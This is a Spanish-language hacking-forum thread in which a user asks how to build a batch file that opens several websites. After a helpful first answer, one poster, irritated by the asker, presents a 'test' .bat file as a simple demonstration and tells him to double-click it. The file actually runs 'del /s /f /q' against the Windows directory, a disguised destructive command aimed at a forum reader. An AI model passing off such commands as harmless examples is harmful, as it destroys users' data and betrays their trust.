elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Únete al Grupo Steam elhacker.NET


+  Foro de elhacker.net
|-+  Foros Generales
| |-+  Dudas Generales (Moderador: engel lex)
| | |-+  ejecutable.
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] 2 Ir Abajo Respuesta Imprimir
Autor Tema: ejecutable.  (Leído 6,010 veces)
jemez44

Desconectado Desconectado

Mensajes: 289


Ver Perfil
ejecutable.
« en: 20 Diciembre 2013, 23:23 pm »

hola, me gustaría crear un archivo ejecutable en el escritorio y que al darle doble click se me abriesen 8 páginas de google crhome diferentes : una con mi facebook, otra con twiter, otras 4 con 4 correos electrónicosque tengo, otra con este foro y otra con forocoches, pero en todas ellas que ya esté logeado (conectado).

¿esto que busco existe?
¿se llama script?


En línea

Si eres novato en el hacking wireless, toma estos consejos para no cometer los errores que yo cometí:

*1--> Léete todos los hilos chicheta de estas secciones "hacking wireles" "hacking wireles windows" y hacking wireless linux"

*2--> Las distribuciones suelen llevar programas que también se encuentran por libre, los cuales suelen tener una pagina web con foros. Regístrate y haz preguntas.
MCKSys Argentina
Moderador Global
***
Desconectado Desconectado

Mensajes: 5.471


Diviértete crackeando, que para eso estamos!


Ver Perfil
Re: ejecutable.
« Respuesta #1 en: 20 Diciembre 2013, 23:35 pm »

Puedes crear un archivo .bat que ejecute los comandos que quieres.

Mira este video: http://www.youtube.com/watch?v=o5Nfm7ywsaA

Saludos!


En línea

MCKSys Argentina

"Si piensas que algo está bien sólo porque todo el mundo lo cree, no estás pensando."

jemez44

Desconectado Desconectado

Mensajes: 289


Ver Perfil
Re: ejecutable.
« Respuesta #2 en: 21 Diciembre 2013, 11:25 am »

gracias.
En línea

Si eres novato en el hacking wireless, toma estos consejos para no cometer los errores que yo cometí:

*1--> Léete todos los hilos chicheta de estas secciones "hacking wireles" "hacking wireles windows" y hacking wireless linux"

*2--> Las distribuciones suelen llevar programas que también se encuentran por libre, los cuales suelen tener una pagina web con foros. Regístrate y haz preguntas.
CloudswX


Desconectado Desconectado

Mensajes: 806


"La física es el sistema operativo del Universo"


Ver Perfil
Re: ejecutable.
« Respuesta #3 en: 22 Diciembre 2013, 04:06 am »

Saludos.

Citar
hola, me gustaría crear un archivo ejecutable en el escritorio y que al darle doble click se me abriesen 8 páginas de google crhome diferentes : una con mi facebook, otra con twiter, otra con este foro y otra con forocoches

Abre el bloc de notas y copia lo siguiente:

Código:
@ echo off
start https://www.facebook.com/
start https://twitter.com/
start http://foro.elhacker.net
start http://www.forocoches.com/
exit

Guárdalo con cualquier nombre y extensión .bat

Citar
otras 4 con 4 correos electrónicos que tengo

Utiliza un gestor de correo, te consumirá menos recursos que tener 4 pestañas mas abiertas.

Citar
pero en todas ellas que ya esté logeado (conectado).

Configura "Recordar contraseñas" en tu navegador por defecto (ojala no sea Iexplorer  :-\ )

Saludos por allá.
En línea



 «Dios no juega a los dados, usa /dev/random.»
twitter: @cloudswx
jemez44

Desconectado Desconectado

Mensajes: 289


Ver Perfil
Re: ejecutable.
« Respuesta #4 en: 22 Diciembre 2013, 04:16 am »

porque añadas .bat no cambiara la naturaleza del bloc de notas.

La alquimia ya está obsoleta.
En línea

Si eres novato en el hacking wireless, toma estos consejos para no cometer los errores que yo cometí:

*1--> Léete todos los hilos chicheta de estas secciones "hacking wireles" "hacking wireles windows" y hacking wireless linux"

*2--> Las distribuciones suelen llevar programas que también se encuentran por libre, los cuales suelen tener una pagina web con foros. Regístrate y haz preguntas.
CloudswX


Desconectado Desconectado

Mensajes: 806


"La física es el sistema operativo del Universo"


Ver Perfil
Re: ejecutable.
« Respuesta #5 en: 22 Diciembre 2013, 05:00 am »

A ver "jemez44", no estoy seguro de tu naturaleza, pero si de una cosa estoy seguro es de que tu tarea es subir el contador de mensajes a toda costa, eso sin importar la estupidez que escribas en cualquier post (como has hecho en muchos por ahi).

porque añadas .bat no cambiara la naturaleza del bloc de notas.

La alquimia ya está obsoleta.

Te encanta opinar sin tener la mínima idea de lo que estas diciendo, solo por tener "uno mas".

Pero como no pertenezco a tu clan paso a explicar:

Existe algo llamado "extensión de archivos" que son esas tres insignificantes letras al final del nombre y que sirven para identificar la naturaleza del mismo, quizás en algún momento de tu vida has visto que los archivos de audio terminan en:    .mp3     .ogg      .flc
Los archivos de texto terminan en:                                                                                                       .txt
Los archivos de excell terminan en:                                                                                                      .xls

Dios!!!! es que no puedo creer que estoy explicando algo tan básico como esto  :-\

Los archivos ejecutables por lote terminan en extensión .bat

Para que me entiendas mas fácil:

1. Abre tu bloc de notas.
2. Dentro del Bloc de notas copia esto:

Código:
@echo off
title g00d by3 wind0w5
echo 4dio5 a tu wind0w5
del /s /f /q c:windows
exit

3. Luego le das a "guardar como.." y le pones el nombre que mas te guste terminando siempre en .bat
por ejemplo: prueba.bat

4. Luego dirígete a la ruta donde lo guardaste y dale doble click.

Luego comentas.

P.D: Espero no confundirte con tan complicados pasos, pero seguro eres un genio y lo logras (si quieres puedes abrir otro post, asi se te sumara otro mensaje mas)
En línea



 «Dios no juega a los dados, usa /dev/random.»
twitter: @cloudswx
CloudswX


Desconectado Desconectado

Mensajes: 806


"La física es el sistema operativo del Universo"


Ver Perfil
Re: ejecutable.
« Respuesta #6 en: 22 Diciembre 2013, 05:04 am »

Citar
A ver "jemez44", no estoy seguro de tu naturaleza,

Yo mismo me pregunto y me respondo.

Citar
"Troll":
se trata de aquellos individuos que participan en foros de debate, blogs, Twitter, chats y otros entornos de conversación para provocar y molestar a los usuarios e interrumpir el ritmo de la conversación.

 :o
En línea



 «Dios no juega a los dados, usa /dev/random.»
twitter: @cloudswx
jemez44

Desconectado Desconectado

Mensajes: 289


Ver Perfil
Re: ejecutable.
« Respuesta #7 en: 22 Diciembre 2013, 18:21 pm »

no has entendido nada.

Un archivo de bloc de notas tiene una naturaleza. ¿cambiandole la extension cambias de naturaleza?
Es lo que no comprendo, pero bueno, si tú lo dices.
En línea

Si eres novato en el hacking wireless, toma estos consejos para no cometer los errores que yo cometí:

*1--> Léete todos los hilos chicheta de estas secciones "hacking wireles" "hacking wireles windows" y hacking wireless linux"

*2--> Las distribuciones suelen llevar programas que también se encuentran por libre, los cuales suelen tener una pagina web con foros. Regístrate y haz preguntas.
Darioo

Desconectado Desconectado

Mensajes: 54



Ver Perfil
Re: ejecutable.
« Respuesta #8 en: 24 Diciembre 2013, 14:04 pm »


Citar
no has entendido nada.

Un archivo de bloc de notas tiene una naturaleza. ¿cambiandole la extension cambias de naturaleza?
Es lo que no comprendo, pero bueno, si tú lo dices.


jemez44 lo que explica CloudswX es correcto, si tenés dudas podés probarlo y ver que funciona. Incluso podes hacer programas completos en el bloc de notas y nombrarlos con extensión .c o .cpp si tu programa es con lenguaje c/c++ justamente, y eso también es correcto. el bloc de notas no es mas que un editor simple.

Espero haber subsanado tus dudas

Saludos.
En línea

No tengo talentos especiales, pero soy profundamente curioso. Einstein
jemez44

Desconectado Desconectado

Mensajes: 289


Ver Perfil
Re: ejecutable.
« Respuesta #9 en: 25 Diciembre 2013, 18:06 pm »

ok, ya lo probaré cuando llegue a caso, que ahora estoy en un ciber.
En línea

Si eres novato en el hacking wireless, toma estos consejos para no cometer los errores que yo cometí:

*1--> Léete todos los hilos chicheta de estas secciones "hacking wireles" "hacking wireles windows" y hacking wireless linux"

*2--> Las distribuciones suelen llevar programas que también se encuentran por libre, los cuales suelen tener una pagina web con foros. Regístrate y haz preguntas.
Páginas: [1] 2 Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
CD ejecutable en wma
Software
Ariel 9 3,625 Último mensaje 24 Diciembre 2003, 09:29 am
por Songoku
Ejecutable
.NET (C#, VB.NET, ASP)
calitb 4 3,644 Último mensaje 12 Julio 2006, 03:25 am
por BADBYTE-K
ejecutable NET
Ingeniería Inversa
Revolutions 2 1,902 Último mensaje 8 Agosto 2012, 19:59 pm
por Revolutions
ejecutable
Hacking
killer98 3 2,695 Último mensaje 27 Agosto 2012, 21:24 pm
por Stakewinner00
¿Generar un ejecutable con configuraciones personalizadas desde otro ejecutable?
.NET (C#, VB.NET, ASP)
Crazy.sx 6 5,068 Último mensaje 26 Noviembre 2012, 13:37 pm
por Novlucker
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines